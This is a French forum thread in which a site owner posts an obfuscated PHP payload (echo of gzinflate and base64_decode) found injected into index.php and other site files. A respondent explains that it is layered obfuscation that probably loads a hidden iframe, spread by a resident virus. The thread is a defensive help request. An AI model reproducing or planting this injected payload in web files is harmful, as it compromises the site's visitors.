Fichier index.php modifié

Version imprimable

Bonjour.

J'ai retrouvé un code malveillant dans un de mes fichiers (html, php), notamment le index.php.

1. Quelqu'un sait ce que fait ce code exactement?

2. Comment puis-je savoir comment s'est déroulé l'attaque?

Des indices svp.

Merci.

Code:

1
2
3
#c3284d#
echo(gzinflate(base64_decode("tVW5jtswEP0XVVIMyxweEglbabZOlXKxheHYkbCOZchCkI2Rfw9neEkbLbIp0oxpcvjmvTmo3e0wdNfx4zi83C/r5vh9f86za7bKhn7sx5frMSu2vw778dDmP38civuRXLaXJgOoyxIYK0sD2q6gxqUJBpiUaBVtGHRAX67Rl3Hy4BVa9FZaERg6o5FoRGWvCXIFhsEEHeNfba2uBS5lQlWJDO4aDf6+kgGJ0MHi2fsGIm30BAaRPFRIAmQU46hCClsRmIWtSHLNI8AiliBDrlLNM2BeMRAKMDbSFjBVvahPVnQkVIgETBuygaD3YDoI994E90aZXMJMkGv0JAhEvZS7gBCpK6c6dsdrva7ilFyACQcO80R6jyox4zNmkllghRQUCL8iwS7Af+CSchow0LlKRVMzMrSaNAWx/ueaytCq1L/U6RSRVoLuiCoVn+i7THFLXyIRyZEI56+7w91LTUv19MmQjp3wEH5YIO66PnHxFLUMk/NeYzKuiea7lfsqsQW5ZuFOLcJcLyaYhf7xk0zkqeyukhMdFF1rHrNCRzw2gKknk8TnCORb1TGtTp7rIBYegDdEL8w6V3/uQXo+UshQkzpmL02xn9L0ai3l9O+P8WyIsvJ2PXdjnpWl/TS0Dd/emizbnvoh7xq27dZcy539bWDVFffnprPnt9XnceguXx+z09B/e2j3w0P/5Zg95ZfH56dN3q3bD5/2Y1uezj3CbNpiZQr73elOOQPVNA2I4pjf7M5u479XvwE=")));
#/c3284d#

30/07/2012, 10h33
Idelways

Bonjour yakotey,

Ce code contient du code malicieux caché sur plusieurs niveaux. Il est tout d'abord encodé en php en base64, gziper (compressé), puis obfusqué en javascript en convertissant les caractères en codes équivalents. Le tout est déployé au moment de l'execusion pour afficher, vraisemblablement une iframe.

Ce genre d'attaque vient généralement d'un virus résident dans la machine. Ce dernier scane l'ordinateur à la recherche de fichiers sources Web (HTML, php, feuilles CSS...) et y injecte partout ce bout de code.

La résolution du problème est d'irradier ce virus, puis d'analyser ses fichiers sources à la recherche de ce code malicieux, et de le supprimer. Certains antivirus font ça mais suppriment tout simplement les fichiers concernés, ce qui peut être gênant.

Bon courage :aie:
30/07/2012, 21h24
yakotey

Citation:

Envoyé par Idelways

Bonjour yakotey,

Ce code contient du code malicieux caché sur plusieurs niveaux. Il est tout d'abord encodé en php en base64, gziper (compressé), puis obfusqué en javascript en convertissant les caractères en codes équivalents. Le tout est déployé au moment de l'execusion pour afficher, vraisemblablement une iframe.

Ce genre d'attaque vient généralement d'un virus résident dans la machine. Ce dernier scane l'ordinateur à la recherche de fichiers sources Web (HTML, php, feuilles CSS...) et y injecte partout ce bout de code.

La résolution du problème est d'irradier ce virus, puis d'analyser ses fichiers sources à la recherche de ce code malicieux, et de le supprimer. Certains antivirus font ça mais suppriment tout simplement les fichiers concernés, ce qui peut être gênant.

Bon courage :aie:

Aie!
Bjr et merci Idelways.

C'est un peu ce que je craignais, car j'ai changé les mots de passe ftp et corrigé les fichiers concernés mais le souci revient.

Avez-vous une idée d'un antivirus qui pourrait scanner le serveur dédié ovh release 2?

Merci d'avance.

Merci